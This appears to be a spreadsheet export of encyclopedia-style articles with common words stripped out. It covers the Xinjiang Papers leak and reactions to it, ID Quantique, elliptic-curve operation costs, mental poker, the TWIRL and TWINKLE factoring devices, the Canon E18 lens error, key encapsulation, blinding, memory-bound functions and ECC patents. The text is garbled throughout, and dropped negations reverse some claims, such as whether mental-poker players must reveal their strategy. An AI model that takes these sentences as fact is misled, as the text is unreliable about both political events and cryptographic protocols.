internment surveillance uyghur muslims expanded rapidly appointment chen quanguo party secretary xinjiang 2016. chen ordered officers "prepare smashing, obliterating offensive" "round everyone rounded up." this included detention anyone "symptoms religious radicalism antigovernment views", including giving smoking drinking, wearing long beards, praying outside mosques studying arabic.the documents contain script local officials turpan order answer questions asked children parents sent internment camps. officials instructed tell returning students parents "training school government" "infected unhealthy thoughts." students asked parents could come home, officials needed "undergo enclosed, isolated treatment", unhealthy thoughts needed "dealt like detox drug addicts." students instructed "not believe spread rumors" "abide states' laws rules", could "add points" relatives shorten detentions. internal investigations local officials documents state internment campaign faced doubts resistance local officials, purged jailed. they specifically mention wang yongzhi, former party secretary yarkand county. wang privately disagreed scale detentions ordered release 7,000 inmates, allegedly stripped power imprisoned. according york times, party "made example" wang show would tolerate resistance campaign. publication york times november 2019, ramzy buckley york times published xinjiang papers article titled "'absolutely mercy: leaked files expose china organized mass detention muslims". documents published along translated excerpts analysis. ramzy buckley state documents provided chinese government official requested anonymity hoped "prevent party leaders, including escaping culpability mass detentions."the publication xinjiang papers followed china cables leak days later. other documents allegedly leaked chinese government sources include aksu list karakax list. following xinjiang papers leak, xinjiang regional government ordered government officials tighten control sensitive information deleting data, destroying documents, restricting information transfer.along reports uyghur repression china, "absolutely mercy: leaked files expose china organized mass detention muslims" nominated pulitzer prize 2020 international reporting category. reactions domestic china's ministry foreign affairs spokesman geng shuang responded york times report press conference november 2019. geng said xinjiang-related issues purely domestic affairs government's measures "have endorsed ethnic groups." geng accused york times using "clumsy patchwork distortion" "hype so-called 'internal documents'" "smear china's counter-terrorism de-radicalization efforts."a spokesperson xinjiang regional government stated report "full nonsense, lies sinister intentions" "completely fabricated." china's ambassador united kingdom described documents "sheer, pure fabrication".while york times said wang yongzhi arrested refusing carry detentions, 2018 report china daily wrote wang removed "serious disciplinary violations" including "bribery, corruption, abuse power." following york times publication, netizens shared article chinese platform sina weibo wrote tributes social media. international australia australian foreign minister marise payne called york times report "disturbing" stated reinforced australia's resolve raise human rights concerns beijing. penny wong, foreign affairs spokesperson australian labor party, called report "deeply disturbing" urged china respond "transparently swiftly." australian greens leader richard natale described report "horrifying" stated australia needed "play active diplomatic role putting maximum pressure china." canada citing evidence "chinese government's documents, satellite imagery, eyewitness testimony", global affairs canada issued joint statement united kingdom calling china "human rights violations abuses" xinjiang. canada called china allow independent members international community investigate situation xinjiang. coordination international partners, canada announced business measures address human rights abuses xinjiang. these measures include prohibition imports produced forced labor, xinjiang integrity declaration canadian companies, issuance third-party analysis forced labor supply chain risks. united kingdom following xinjiang papers china cables leaks, cited "chinese authorities' government documents" evidence human rights violations uyghur muslims, including forced labor extrajudicial detention. coordination international partners including canada, announced business measures ensure organizations "contributing abuse uyghur muslims xinjiang." this includes review export controls xinjiang introduction financial penalties organizations violating modern slavery act. united states press conference november 2019, secretary state mike pompeo said xinjiang papers "detail chinese party's brutal detention systematic repression uyghurs." pompeo said documents align growing body evidence china committing human rights violations. called chinese government policies xinjiang "immediately release arbitrarily detained." speech united states senate, senate majority leader mitch mcconnell called leaked documents "handbook [an] orwellian campaign effectively erase religious ethnic minority."several politicians retweeted article york times, including biden, ilhan omar, chuck schumer, elizabeth warren. biden described china's treatment uyghur muslims "among worst abuses human rights world today", omar called documents "chilling portrait chinese government's campaign mass detention ethnic cleansing." schumer wrote xinjiang papers "exposes chinese communist party's lies" reveals "brutal [and] repressive campaign" uyghur muslims. warren described china's treatment uyghur muslims "horrifying human rights violation" said must stand hatred extremism home around world."several lawmakers cited xinjiang papers calling passage uyghur human rights policy act, condemns human rights violations xinjiang calls sanctions chen quanguo. uyghur human rights policy signed president donald trump june 2020. under global magnitsky act, imposed sanctions chen quanguo, hailun, government officials connection serious human rights abuses" xinjiang.the xinjiang papers leak also prompted calls boycott 2022 beijing winter olympics. while department state spokesman price said wished discuss possible boycott allies object china's treatment uyghur muslims, state department denied discussions ongoing. allegations human rights violations xinjiang papers leak contributed accusations extrajudicial detention genocide chinese government. according australian strategic policy institute, documents demonstrate "scale depth beijing's xinjiang program" make difficult china deny allegations uyghur muslim persecution.some claim documents constitute "direct linkage" leadership human rights abuses xinjiang. dolkun isa, president world uyghur congress, said papers "reveal premeditated policy highest levels chinese government eradicate identity." according article international security, xinjiang papers "confirm importance terrorism minds senior party leaders, including jinping."the xinjiang papers cited evidence uyghur genocide chinese government uyghur muslims. along leaked documents, publication xinjiang papers increased attention scrutiny china's internment camps xinjiang. also antireligious campaigns china china cables, november 2019 data leak ethnic issues china human rights china uyghur genocide xinjiang conflict xinjiang police files, 2022 data leak references</t>
  </si>
  <si>
    <t>ID Quantique</t>
  </si>
  <si>
    <t>quantique (idq) swiss company, based geneva, switzerland, provides quantum distribution (qkd) systems, quantum safe network encryption, single photon counters, hardware random number generators. founded 2001 spin-off group applied physics university geneva. company structured three business units: quantum safe cryptography division photon counting division quantum random number generation division quantum safe cryptography division quantum safe cryptography division focuses data protection provides: quantum-safe network encryption quantum distribution quantum generation management photon counting division photon counting division works optical instrumentation products photon counters visible infrared spectrum photon pair sources quantum distribution applications random number generation company's work random number generation focuses developing hardware random number generators based quantum randomness, cryptographic security applications (quantum generation) research purposes (montecarlo simulations). quantique achievements company realized several world premieres quantum technology innovation. 2004, quantique first world bring quantum distribution system commercial market. (magiq technologies, inc. announced availability quantum distribution system 2003.) 2007 quantum cryptography deployed government first time ever protect geneva state elections switzerland. still deployment. 2010 company deployed multiplexed networks 1gbit/s data, 2011 company systems months swissquantum network cooperation university geneva. 2014, principles together university geneva, broke world record longest distance exchange 2014 idq's quantis true random number generator became first qrng pass german bsi's ais31 randomness validation. 2014 quantique battelle co-founded quantum-safe security working group cloud security alliance (csa). group aims help governments industry understand quantum‐safe methods protecting networks data, following call european telecommunications institute (etsi) quantum safe cryptography 2014 white paper “quantum safe cryptography security”. quantique also announced quantum random number generator (qrng) chip integrated ‘vsmart aris smartphone made vinsmart, member vingroup vietnam. also quantum distribution quantum cryptography hardware random number generator notes</t>
  </si>
  <si>
    <t>Table of costs of operations in elliptic curves</t>
  </si>
  <si>
    <t>elliptic curve cryptography popular form public encryption based mathematical theory elliptic curves. points elliptic curve added form group addition operation. this article describes computational costs group addition certain related operations used elliptic curve cryptography algorithms. abbreviations operations next section presents table time-costs possible operations elliptic curves. columns table labelled various computational operations. rows table different models elliptic curves. these operations considered adding (add) doubling (dbl) points elliptic curves defined, group law. importance doubling speed scaler multiplication discussed table. information possible operations elliptic curves http://hyperelliptic.org/efd/g1p/index.html. tabulation under different assumptions multiplication, addition, inversion elements fixed field, time-cost operations varies. table assumed that: 100m, *param *const 0mthis means multiplications required invert element; multiplication required compute square element; multiplication needed multiply element parameter (*param), constant (*const), elements. information results obtained different assumptions, http://hyperelliptic.org/efd/g1p/index.html importance doubling applications elliptic curve cryptography elliptic curve method factorization (ecm) necessary consider scalar multiplication [n]p. compute successively: {\displaystyle p,\quad [2]p=p+p,\quad [3]p=[2]p+p,\dots ,[n]p=[n-1]p+p} faster double-and-add method, e.g. [5]p [2]([2]p) general compute [k]p, write {\displaystyle k=\sum _{i\leq l}k_{i}2^{i}} {0,1} {\displaystyle l=[log_{2}k]} then: {\displaystyle [2](....([2]([2]([2]([2]([2]p+[k_{(l-1)}]p)+[k_{(l-2)}]p)+[k_{(l-3)}]p)+\dots )\dots +[k_{1}]p)+[k_{0}]p=[2^{l}]p+[k_{(l-1)}2^{l-1}]p+\dots +[k_{1}2]p+[k_{0}]p} note that, simple algorithm takes steps step consists doubling adding points. reasons addition doubling formulas defined. furthermore, method applicable group group written multiplicatively, double-and-add algorithm instead called square-and-multiply algorithm. references http://hyperelliptic.org/efd/g1p/index.html</t>
  </si>
  <si>
    <t>Mental poker</t>
  </si>
  <si>
    <t>mental poker common name cryptographic problems concerns playing fair game distance without need trusted third party. term also applied theories surrounding problems possible solutions. name comes card game poker games kind problem applies. similar problems described party games blum's flipping coin distance, yao's millionaires' problem, rabin's oblivious transfer. problem described thus: "how allow authorized actors access certain information using trusted arbiter?" (eliminating trusted third-party avoids problem trying determine whether third party trusted not, also reduce resources required.) poker, could translate "how make sure player stacking deck peeking players' cards shuffling deck ourselves?". physical card game, would relatively simple players sitting face face observing other, least possibility conventional cheating ruled out. however, players sitting location instead widely separate locations pass entire deck (using postal mail, instance), suddenly becomes difficult. electronic card games, online poker, mechanics game hidden user, impossible unless method used cannot allow party cheat manipulating inappropriately observing electronic "deck". several protocols suggested, first shamir, rivest adleman (the creators rsa-encryption protocol). this protocol first example parties conducting secure computation rather secure message transmission, employing cryptography; later leaking partial information original protocol, definition semantic security shafi goldwasser silvio micali. concept multi-player mental poker introduced moti yung's 1984 book cryptoprotocols. area later evolved known secure multi-party computation protocols (for parties, multi parties well). shuffling cards using commutative encryption possible algorithm shuffling cards without trusted third party commutative encryption scheme. commutative scheme means data encrypted once, order decrypts data matter. example: alice plaintext message. encrypts this, producing garbled ciphertext gives bob. encrypts ciphertext again, using scheme alice another key. when decrypting double encrypted message, encryption scheme commutative, matter decrypts first. algorithm algorithm shuffling cards using commutative encryption would follows: alice agree certain "deck" cards. practice, means agree numbers data element represents card. alice picks encryption uses encrypt card deck. alice shuffles cards. alice passes encrypted shuffled deck bob. with encryption place, cannot know card which. picks encryption uses encrypt card encrypted shuffled deck. shuffles deck. passes double encrypted shuffled deck back alice. alice decrypts card using this still leaves bob's encryption place though cannot know card which. alice picks encryption card (a1, etc.) encrypts individually. alice passes deck bob. decrypts card using this still leaves alice's individual encryption place though cannot know card which. picks encryption card (b1, etc.) encrypts individually. passes deck back alice. alice publishes deck everyone playing case alice bob, expansion though).the deck shuffled. this algorithm expanded arbitrary number players. players carol, dave forth need repeat steps 8-10. during game, alice pick cards deck, identified order placed shuffled deck. when either player wants cards, request corresponding keys player. that player, upon checking requesting player indeed entitled look cards, passes individual keys cards player. check ensure player request keys cards belong player. example: alice picked cards shuffled deck. picked cards requests look allotted cards. alice agrees entitled look cards gives individual card keys a10. decrypts cards using alice's keys cards, b10. cards. alice cannot know cards access bob's keys required decrypt cards. weakness encryption scheme used must secure known-plaintext attacks: must able determine alice's original enough allow decrypt cards hold) based knowledge unencrypted values cards drawn. this rules obvious commutative encryption schemes, simply xoring card key. (using separate card even initial exchange, would otherwise make scheme secure, work since cards shuffled they're returned.) depending deck agreed upon, algorithm weak. when encrypting data, certain properties data preserved plaintext ciphertext. this used "tag" certain cards. therefore, parties must agree deck cards properties preserved encryption. toolbox mental card games" implementation christian schindelhauer describes sophisticated protocols perform verify large number useful operations cards stacks cards 1998 paper toolbox mental card games" [sch98]. work concerned general-purpose operations (masking unmasking cards, shuffling re-shuffling, inserting card stack, etc.) make protocols applicable card game. cryptographic protocols used schindelhauer based quadratic residuosity, general scheme similar spirit protocol. correctness operations checked using zero-knowledge proofs, players need reveal strategy verify game's correctness. library libtmcg [sta05] provides implementation schindelhauer toolbox. used implement secure version german card game skat, achieving modest real-world performance. game skat played three players 32-card deck, substantially less computationally intensive poker game anywhere five eight players full 52-card deck. non-shuffling poker protocol date, mental poker approaches based standard alice-bob protocol (above) offer high enough performance real-time online play. requirement player encrypts card imposes substantial overhead. recent paper golle [gol05] describes mental poker protocol achieves significantly higher performance exploiting properties poker game move away encrypt-shuffle model. rather shuffle cards deal needed, approach, players generate (encrypted) random numbers fly, used select next card. every card needs checked cards already dealt detect duplicates. result, method uniquely useful poker-style games, number cards dealt small compared size whole deck. however, method needs cards already dealt known all, poker-style games would beat purpose. card-generation algorithm requires cryptosystem properties. encryption must additively homomorphic, e(c1)*e(c2) e(c1 c2). second, collisions must detectable, without revealing plaintext. words, given e(c1) e(c2), must possible answer whether c1=c2, without players learning information (specifically, identities c2). elgamal encryption scheme example well-known system properties. algorithm operates follows: players initialize empty list records cards use. deal card, player computes random number {0,...,51}, computes e(ri), publishes non-malleable commitment e(ri) players publish actual e(ri), verify every player honors commitment players compute {\displaystyle e(r_{i})=e(\sigma r_{i})} produces encrypted card e(r*), {\displaystyle r*=\sigma r_{i}} players check e(r*) already not, e(r*) dealt appropriate player, added when cards need revealed, jointly decrypted.in way, players need compute encryption cards actually used game, plus overhead collisions small long number cards needed much less size deck. result, scheme turns times faster measured total number modular exponentiations) best-known protocol [jak99] full shuffling using mix-networks. note random number generation secure long player generating valid random numbers. even players collude generate number long player truthfully generates random {\displaystyle {\displaystyle r=r*+r'} still uniformly random 51}. measured terms number single-agent encryptions, algorithm [gol05] optimal collisions occur, sense protocol fair every player must perform least many encryption operations. minimum, every agent must encrypt every card actually used. otherwise, agent participate encryption, agent susceptible cheated coalition remaining players. unknown non-encrypting agent, agents share keys enable know values cards. thus, approach relying agents perform encryption must focus schemes minimize effect collisions achieve better performance. better performance increased trust mental poker protocol relies players perform encryption bound requirement every player encrypt every card dealt. however, making limited assumptions trustworthiness third parties, significantly efficient protocols realized. protocol choosing cards without shuffling adapted encryption handled servers. under assumption servers non-colluding, protocol secure. basic protocol using servers follows: servers encrypt shuffle deck cards, publish non-malleable commitment permutation encrypted cards players. this done several well-understood cryptographic protocols. players compute independent random numbers {0,...,51}, combined generate random number {0,..., 51}, [gol05] random number used index random permutation, appropriate player gains "ownership" specified card, servers send player keys read card's value.in protocol, servers must collude either learn values cards. furthermore, players ultimately decide cards dealt, non-trustworthy servers unable influence game extent possible traditional online poker. scheme extended allow servers, (and thus, increased security), simply including additional servers initial encryption. finally, step protocol done offline, allowing large numbers shuffled, encrypted "decks" pre-computed cached, resulting excellent in-game performance. references goldwasser, micali, 1982. probabilistic encryption play mental poker keeping secret partial information. proceedings fourteenth annual symposium theory computing. [sta05] stamer, efficient electronic gambling: extended implementation toolbox mental card games. weworc 2005, p-74, 1-12, 2005 [sch98] schindelhauer, toolbox mental card games. tech. rep. medizinische universitat lubeck. [gol05] golle, dealing cards poker games. proceedings international conference information technology: coding computing, (2005) external links bibliography mental poker libtmcg library creating secure fair online card games dealing cards cryptography numberphile video rivest explaining intuition behind mental poker paper.</t>
  </si>
  <si>
    <t>TWIRL</t>
  </si>
  <si>
    <t>cryptography number theory, twirl (the weizmann institute relation locator) hypothetical hardware device designed speed sieving step general number field sieve integer factorization algorithm. during sieving step, algorithm searches numbers certain mathematical relationship. distributed factoring projects, step parallelized large number processors. twirl still hypothetical device implementation publicly reported. however, designers, shamir eran tromer, estimate twirl built, would able factor 1024-bit numbers year cost dozen million dollars". twirl could therefore enormous repercussions cryptography computer security many high-security systems still 1024-bit keys, twirl would able break reasonable amount time reasonable costs. security important cryptographic algorithms, notably blum blum shub pseudorandom number generator, rests difficulty factorizing large integers. factorizing large integers becomes easier, users algorithms resort using larger keys (computationally expensive) using different algorithms, whose security rests computationally hard problem (like discrete logarithm problem). also custom hardware attack twinkle references external links "the twirl integer factorization device" homepage</t>
  </si>
  <si>
    <t>E18 error</t>
  </si>
  <si>
    <t>error error message canon digital cameras. error occurs anything prevents zoom lens properly extending retracting.[1] error become notorious canon user community completely disable camera, requiring expensive repairs. consumeraffairs.com reports "lens feature called bellows claw, gear physically extends retracts lens. piece holds lens, barrier plate, large enough sometimes cause bellows claw malfunction, resulting stuck lens". result black screen contains error message, e18. another problem mentioned site blames sticky iris lens, caused grease entering inside microphones built lens. buildup freezes ability lens open. although error coding made problem seem particular domain canon cameras, problem actually quite common throughout cameras telescopic lens barrels. result, canon since dropped error code newer cameras. place adopted common term "lens error" manufacturers use. such, newer cameras report term problem occurs. causes according canon, following: camera activating lens opening confined space blocked extracted lens getting jarred battery condition unit turned dropping camera foreign substances, dust, sand dirt entering camera body. general jarring camera "general camera malfunction"one major contributor lens errors improper camera cases, carrying cameras pockets. inadvertent activation camera case pocket cause lens extend lens restricted movement, causing error. another cause sand, dust, dirt accumulate bottom case cleaned regularly (and lint pockets). these materials readily cling camera electrostatic build-up camera rubbing side case, especially cases soft fibrous interiors. lens error occur materials work lens mechanism. another major contributor sand general. extra care utilized taking camera beach. sand cling lens barrel, electrostatic attraction. this lens mechanism tries close. when beach, always inspect lens barrel prior closing ensure sand particles clinging single grain camera). repairing error different types problems reported: camera take couple shots (clear focus), stops working. removing batteries replacing produce extra shots. canon's instructions phone) 'remove batteries, rotate button hold seconds, replace battery'. lucky pictures clear focus. better solution (not provided canon) connect camera computer. this completely solve problem. not, least allow extra 10–15 shots. there several forums mention connecting camera completely resolved error. camera lens out-of-focus. some users able manipulate lens back place (see reference links below). problem, often necessary camera optical assembly disassembled, realigned reassembled. non-warranty repair authorized service center reportedly costs $250.there number online guides repairing errors oneself,[2] simple guides tapping lens back place[3] complete disassembly/realignment/reassembly instructions. many fixes presented listed "external links", also found search engines common term "lens error" utilized search. class action chicago firm, horwitz, horwitz associates, filed class action lawsuit 2005.[4] firm girard gibbs bartolomeo investigating camera error file class-action lawsuit canon.[5] lawsuit filed dismissed 2006, plaintiffs planned appeal. references digital camera disasters: will yours fixed? widespread camera problem gets out-of-warranty repairs, another gets lawsuit. (grace aquino, world, tuesday february 2006) repair guide ixus sd300 repair guide quick (cnet digital cameras forum) action horwitz, horwitz associates wayback machine (archived january 2013) investigation girard gibbs bartolomeo (currently accepting users help investigation) external links error experiences list cameras affected error along anecdotes photographed solution problem lens error repair techniques involve opening camera. extensive reader database additional tips problem. worked entire website dedicated error (canon lens error) chicago firms ebay seller canon models lens error</t>
  </si>
  <si>
    <t>TWINKLE</t>
  </si>
  <si>
    <t>twinkle (the weizmann institute locating engine) hypothetical integer factorization device described 1999 shamir purported capable factoring 512-bit integers. also twinkling leds used device. shamir estimated cost twinkle could $5000 unit bulk production. twinkle successor named twirl efficient. method goal twinkle implement sieving step number field sieve algorithm, fastest known algorithm factoring large integers. sieving step, least 512-bit larger integers, time consuming step nfs. involves testing large numbers b-'smoothness', i.e., absence prime factor greater specified bound what remarkable twinkle purely digital device. gets efficiency eschewing binary arithmetic "optical" adder hundreds thousands quantities single clock cycle. idea used "time-space inversion". conventional sieving carried prime time. prime, numbers tested smoothness range consideration divisible prime counter incremented logarithm prime (similar sieve eratosthenes). twinkle, hand, works candidate smooth number (call time. there corresponding prime smaller time instant corresponding leds glowing corresponds primes divide this accomplished associated prime glow every time instants. further, intensity proportional logarithm corresponding prime. thus, total intensity equals logarithms prime factors smaller this intensity equal logarithm b-smooth. even pc-based implementations, common optimization speed sieving adding approximate logarithms small primes together. similarly, twinkle much room error light measurements; long intensity right level, number likely smooth enough purposes known factoring algorithms. existence even large factor would imply logarithm large number missing, resulting intensity; numbers property, device's output would tend consist stretches intensity output brief bursts high intensity output. assumed square-free, i.e. divisible square prime. this acceptable since factoring algorithms require "sufficiently many" smooth numbers, "yield" decreases small constant factor square-freeness assumption. there also problem false positives inaccuracy optoelectronic hardware, easily solved adding pc-based post-processing step verifying smoothness numbers identified twinkle. also twirl, successor twinkle references</t>
  </si>
  <si>
    <t>Key encapsulation mechanism</t>
  </si>
  <si>
    <t>cryptographic protocols, encapsulation mechanism (kem) used secure symmetric material transmission using asymmetric (public-key) algorithms. commonly used hybrid cryptosystems. practice, public systems clumsy transmitting long messages. instead often used exchange symmetric keys, relatively short. symmetric used encrypt longer message. traditional approach sending symmetric public systems first generate random symmetric encrypt using chosen public algorithm. recipient decrypts public message recover symmetric key. symmetric generally short, padding required full security proofs security padding schemes often less complete. kems simplify process generating random element finite group underlying public system deriving symmetric hashing element, eliminating need padding. example using encryption using notation employed system article, alice transmitted public {\displaystyle (n,e)} bob, keeping private secret, usual. wishes send symmetric alice. might 256-bit key, example. note public {\displaystyle typically 1024-bits even longer, thus much larger typical symmetric keys. {\displaystyle small enough {\displaystyle m^{e}&lt;n} encryption quickly broken using ordinary integer arithmetic.to avoid potential weakness, first turns larger integer {\displaystyle 1&lt;m&lt;n} using agreed-upon reversible protocol known padding scheme, oaep. computes ciphertext {\displaystyle corresponding {\displaystyle c\equiv m^{e}{\pmod {n}}.} alice recover {\displaystyle {\displaystyle using private exponent {\displaystyle following computation: {\displaystyle m\equiv c^{d}{\pmod {n}}.} given {\displaystyle recovers original message reversing padding scheme. with process simplified follows:instead generating random symmetric first generates random {\displaystyle {\displaystyle 1&lt;m&lt;n} derives symmetric {\displaystyle m=kdf(m)} {\displaystyle kdf} derivation function, cryptographic hash. computes ciphertext {\displaystyle corresponding {\displaystyle {\displaystyle c\equiv m^{e}{\pmod {n}}.} alice recovers {\displaystyle {\displaystyle using private exponent {\displaystyle method above: {\displaystyle m\equiv c^{d}{\pmod {n}}.} given {\displaystyle recover symmetric {\displaystyle m=kdf(m)} eliminates complexity padding scheme proofs needed show padding secure. note calculated {\displaystyle approach, reverse possible, assuming derivation function one-way. attacker somehow recovers cannot plaintext {\displaystyle with padding approach, can. thus said encapsulate key. note {\displaystyle used encapsulate keys {\displaystyle recipients, receivers share exponent {\displaystyle different {\displaystyle p,q} {\displaystyle recover {\displaystyle chinese remainder theorem. thus, encapsulations several recipients need computed, independent values {\displaystyle used. similar techniques available diffie-hellman exchange public methods. references also wrap optimal asymmetric encryption padding hybrid cryptosystem</t>
  </si>
  <si>
    <t>Blinding (cryptography)</t>
  </si>
  <si>
    <t>cryptography, blinding technique agent provide service (i.e., compute function for) client encoded form without knowing either real input real output. blinding techniques also applications preventing side-channel attacks encryption devices. more precisely, alice input oscar function alice would like oscar compute f(x) without revealing either him. reason wanting might know function resources compute alice "blinds" message encoding input e(x); encoding must bijection input space ideally random permutation. oscar gives f(e(x)), applies decoding obtain d(f(e(x))) functions allow blind computation. times, blinding must applied care. example latter rabin–williams signatures. blinding applied formatted message random value honor jacobi requirements could lead private recovery. demonstration recovery seen cve-2015-2141 discovered evgeny sidorov. common application blinding blind signature. blind signature protocol, signer digitally signs message without able learn content. one-time (otp) application blinding secure communication problem, nature. alice would like send message secretly, however communication read oscar. therefore, alice sends message blinding secret shares bob. reverses blinding receiving message. example, function identity typically operation. blinding also used prevent certain side-channel attacks asymmetric encryption schemes. side-channel attacks allow adversary recover information input cryptographic operation, measuring something algorithm's result, e.g., power consumption, computation time, radio-frequency emanations device. typically attacks depend attacker knowing characteristics algorithm, well (some) inputs. setting, blinding serves alter algorithm's input unpredictable state. depending characteristics blinding function, prevent leakage useful information. note security depends also resistance blinding functions side-channel attacks. example, blinding involves computing blinding operation e(x) (xr)e random integer relatively prime (i.e. gcd(r, plaintext, public exponent modulus. usual, decryption function f(z) applied thus giving f(e(x)) (xr)ed finally unblinded using function d(z) zr−1 multiplying yields desired. when decrypting manner, adversary able measure time taken operation would able make information applying timing attacks known vulnerable know constant hence knowledge real input primitives. examples blinding references external links timing attacks implementations diffie-hellman, rsa, other systems breaking rabin-williams digital signature system implementation crypto++ library</t>
  </si>
  <si>
    <t>Memory-bound function</t>
  </si>
  <si>
    <t>memory bound refers situation time complete given computational problem decided primarily amount free memory required hold working data. this contrast algorithms compute-bound, number elementary computation steps deciding factor. memory computation boundaries sometimes traded other, e.g. saving reusing preliminary results using lookup tables. memory-bound functions memory functions memory-bound functions memory functions related involve extensive memory access, distinction exists two. memory functions dynamic programming technique called memoization order relieve inefficiency recursion might occur. based simple idea calculating storing solutions subproblems solutions reused later without recalculating subproblems again. best known example takes advantage memoization algorithm computes fibonacci numbers. following pseudocode uses recursion memoization, runs linear time: compare algorithm uses recursion, runs exponential time: while recursive-only algorithm simpler elegant algorithm uses recursion memoization, latter significantly lower time complexity former. term "memory-bound function" surfaced recently used principally describe function uses consists series computations computation depends previous computation. whereas memory functions long important actor improving time complexity, memory-bound functions seen fewer applications. recently, however, scientists proposed method using memory-bound functions means discourage spammers abusing resources, could major breakthrough area. using memory-bound functions prevent spam memory-bound functions might useful proof-of-work system could deter spam, become problem epidemic proportions internet. 1992, research scientists cynthia dwork moni naor published paper crypto 1992 titled pricing processing combatting junk mail, suggesting possibility using cpu-bound functions deter abusers sending spam. scheme based idea computer users much likely abuse resource cost abusing resource negligible: underlying reason spam become rampant sending e-mail minuscule cost spammers. dwork naor proposed spamming might reduced injecting additional cost form expensive computation: cpu-bound functions would consume resources sender's machine message, thus preventing huge amounts spam sent short period. basic scheme protects abuses follows: sender, recipient, e-mail. agreed beforehand receive e-mail transmitted usual way. otherwise, computes function g(m) sends g(m)) checks receives form g(m)). yes, accepts otherwise, rejects figure right depicts cases prior agreements. function selected verification relatively fast (taking millisecond) computation somewhat slow (involving least several seconds). therefore, discouraged sending multiple recipients prior agreements: cost terms time computing resources computing repeatedly become prohibitive spammer intends send many millions e-mails. major problem using scheme fast cpus compute much faster slow cpus. further, higher-end computer systems also sophisticated pipelines advantageous features facilitate computations. result, spammer state-of-the-art system hardly affected deterrence typical user mediocre system adversely affected. computation takes seconds take minute several minutes pda, might nuisance users pcs, probably unacceptable users pdas. disparity client speed constitutes prominent roadblocks widespread adoption scheme based cpu-bound function. therefore, researchers concerned finding functions computer systems evaluate speed, high-end systems might evaluate functions somewhat faster low-end systems (2–10 times faster, 10–100 times faster) disparities might imply. these ratios "egalitarian" enough intended applications: functions effective discouraging abuses prohibitive delay legitimate interactions, across wide range systems. egalitarian approach rely memory-bound functions. stated before, memory-bound function function whose computation time dominated time spent accessing memory. memory-bound function accesses locations large region memory unpredictable way, using caches effective. recent years, speed grown drastically, comparatively small progress developing faster main memory. since ratios memory latencies machines built last five years typically greater two, almost always less four, memory-bound function egalitarian systems foreseeable future. also computer architecture bound dynamic programming bound memoization memory-hard function optimal substructure proof work recursion memory bottleneck references external links implementation memory bound function computer architecture computer memory works dynamic programming bound bound spam consumer information</t>
  </si>
  <si>
    <t>ECC patents</t>
  </si>
  <si>
    <t>patent-related uncertainty around elliptic curve cryptography (ecc), patents, main factors limiting wide acceptance. example, openssl team accepted patch 2005 openssl version 0.9.8), despite fact submitted 2002. according bruce schneier 2007, "certicom certainly claim ownership ecc. algorithm developed patented company's founders, patents well written strong. like claim ownership." additionally, licensed patents certicom us$25 million deal suite algorithms. (ecmqv longer part suite however, according laboratories, cases, implementation technique patented, prime representation, alternative, compatible implementation techniques covered patents." additionally, daniel bernstein stated "not aware patents cover curve25519 elliptic curve diffie–hellman algorithm implementation. 6090, published february 2011, documents techniques, published long even patented patents previously published techniques would expired. known patents certicom holds patent efficient gf(2n) multiplication normal basis representation; u.s. patent 5,787,028 expired 2016. certicom holds multiple patents cover (menezes, vanstone) agreement technique: u.s. patent 5,761,305 expired 2015 u.s. patent 5,889,865 expired 2015 u.s. patent 5,896,455 expired 2015 u.s. patent 6,122,736 expired 2015 u.s. patent 6,785,813 expired 2017 0739105 /ep0739105b1 expired 2016 certicom holds u.s. patent 6,563,928 technique validating exchange messages using prevent man-in-the middle attack, expired 2016. related u.s. patent 5,933,504, u.s. patent 8,953,787, u.s. patent 8,229,113 also expired 2016 u.s. patent 7,567,669 expired 2018. certicom holds u.s. patent 6,704,870 u.s. patent 5,999,626 regarding digital signatures smartcard; expired 2017 2016 respectively. certicom holds u.s. patent 6,782,100 calculating x-coordinate double point binary curves montgomery ladder projective coordinates. priority date 1997 filing date 2000. claims disclosed original patent application expired claims still enforceable 2020. national security agency holds u.s. patent 4,567,600, u.s. patent 4,587,627, u.s. patent 6,212,279, u.s. patent 6,243,467 efficient gf(2n) calculations normal basis (all patents expired lapsed google shows) failure fees) data security holds u.s. patent 5,854,759 efficient basis conversion. expired 2017. hewlett-packard holds u.s. patent 6,252,960 compression decompression data points elliptic curves. expired 2018.according nsa, certicom holds patents relating elliptic curves public cryptography general.it difficult create complete list patents related ecc, good starting point standards efficient cryptography group (secg) group devoted exclusively developing standards based ecc. there controversy validity patent claims. certicom's lawsuit sony 2007, certicom filed lawsuit sony united states district court eastern district texas marshall office, claiming sony's advanced access content system digital transmission content protection violates certicom's patents cryptographic method. particular, certicom alleged violation u.s. patent 6,563,928 u.s. patent 6,704,870. lawsuit dismissed 2009. stipulation states, "whereas certicom sony entered settlement agreement pursuant agreed dismissal without prejudice, parties therefore jointly move dismiss claims counterclaims asserted suit, without prejudice right pursue claims counterclaims future."as prior art, sony claimed: '870 patent: alfred menezes, minghua scott vanstone, ieee p1363 standard, standard rsa, diffie–hellman related public-key cryptography, part elliptic curve systems (draft (october 1994) '928 patent: scott vanstone, agnew mullin, implementation elliptic curve cryptosystems f2155, ieee journal selected areas communications, volume issue 1993 also elliptic curve cryptography references external links "crypto faq: 6.3.4 elliptic curve cryptosystems patented?". security. archived original 2013-05-24. retrieved 2013-08-12. "the case elliptic curve cryptography". national security agency. 2009-01-15. archived original 2009-01-17. retrieved 2013-08-12. shankland, stephen (2002-09-19). "open-source group gets security gift". cnet. retrieved 2013-08-12. klimov, alexander (2005-10-15). "ecc patents?". cryptography metzdowd.com. archived original 2016-04-09. retrieved 2013-08-12. moeller, bodo (2005-10-17). "ecc patents?". cryptography@metzdowd.com. archived original 2016-04-09. retrieved 2013-08-12. "secg patent policy april 1999: patents held certicom" (pdf). secg. 1999-05-27. retrieved 2013-08-12. "secg patent policy february 2005: patents held certicom" (pdf). secg. 2005-02-10. retrieved 2013-08-12. harper, menezes vanstone, public-key cryptosystems very small lengths, eurocrypt (lncs 658) "certicom sony complaint, 2:07-cv-216" (pdf). 2007-05-31. retrieved 2013-08-12. denis, (2006). "elliptic curve cryptography redux" (pdf). toorcon 0x08: 24–28. archived original (pdf) 2012-02-01. retrieved 2013-04-11.</t>
  </si>
  <si>
    <t>Blind signature</t>
  </si>
  <si>
